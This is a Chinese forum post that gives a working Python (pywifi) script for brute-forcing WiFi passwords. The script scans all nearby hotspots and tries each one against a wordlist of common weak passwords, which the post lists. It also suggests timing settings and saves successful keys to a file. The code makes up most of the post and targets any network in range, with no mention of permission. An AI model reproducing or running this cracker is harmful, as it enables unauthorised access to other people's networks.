Python尝试**wifi无线密码

楼主(2018-04-14):
导入模块

这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。

from pywifi import *import timeimport sys字典准备

随机搞的wifi弱口令TOP10

  • 12345678
  • 123456789
  • 88888888
  • 1234567890
  • 00000000
  • 87654321
  • 66668888
  • 11223344
  • 147258369
  • 11111111
配置扫描器

推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里

ef main():
    #扫描时常
    scantimes = 3
    #单个密码测试延迟
    testtimes = 15
    output = sys.stdout
    #结果文件保存路径
    files = "TestRes.txt"
    #字典列表
    keys = open(sys.argv[1],"r").readlines()
    print "|KEYS %s"%(len(keys))
    #实例化一个pywifi对象
    wifi = PyWiFi()
    #选择定一个网卡并赋值于iface
    iface = wifi.interfaces()[0]
    #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
    scanres = scans(iface,scantimes)
    #统计附近被发现的热点数量
    nums = len(scanres)
    print "|SCAN GET %s"%(nums)
    print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)
    #将每一个热点信息逐一进行测试
    for i,x in enumerate(scanres):
        #测试完毕后,成功的结果讲存储到files中
        res = test(nums-i,iface,x,keys,output,testtimes)
        if res:
            open(files,"a").write(res)

楼主:
扫描周围热点
def scans(face,timeout):
    #开始扫描
    face.scan()
    time.sleep(timeout)
    #在若干秒后获取扫描结果
    return face.scan_results()

楼主:
热点测试
这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。
def test(i,face,x,key,stu,ts):
    #显示对应网络名称,考虑到部分中文名啧显示bssid
    showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
    #迭代字典并进行爆破
    for n,k in enumerate(key):
        x.key = k.strip()
        #移除所有热点配置
        face.remove_all_network_profiles()
        #讲封装好的目标尝试连接
        face.connect(face.add_network_profile(x))
        #初始化状态码,考虑到用0会发生些逻辑错误
        code = 10
        t1 = time.time()
        #循环刷新状态,如果置为0则密码错误,如超时则进行下一个
        while code!=0 :
            time.sleep(0.1)
            code = face.status()
            now = time.time()-t1
            if now>ts:
                break
            stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("\n","")))
            stu.flush()
            if code == 4:
                face.disconnect()
                return "%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k)
    return False

案例
这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

WIFIID 热点的id号 每跑一个会减1
SSID OR BSSID 热点的ssid名或mac地址
N 对热点的连接状态,这个在
time 当前所花去的时间
signal 热点的信号强度,若小越好
KEYNUM 测试密码的id 每跑一个会减1
KEY 当前测试的密码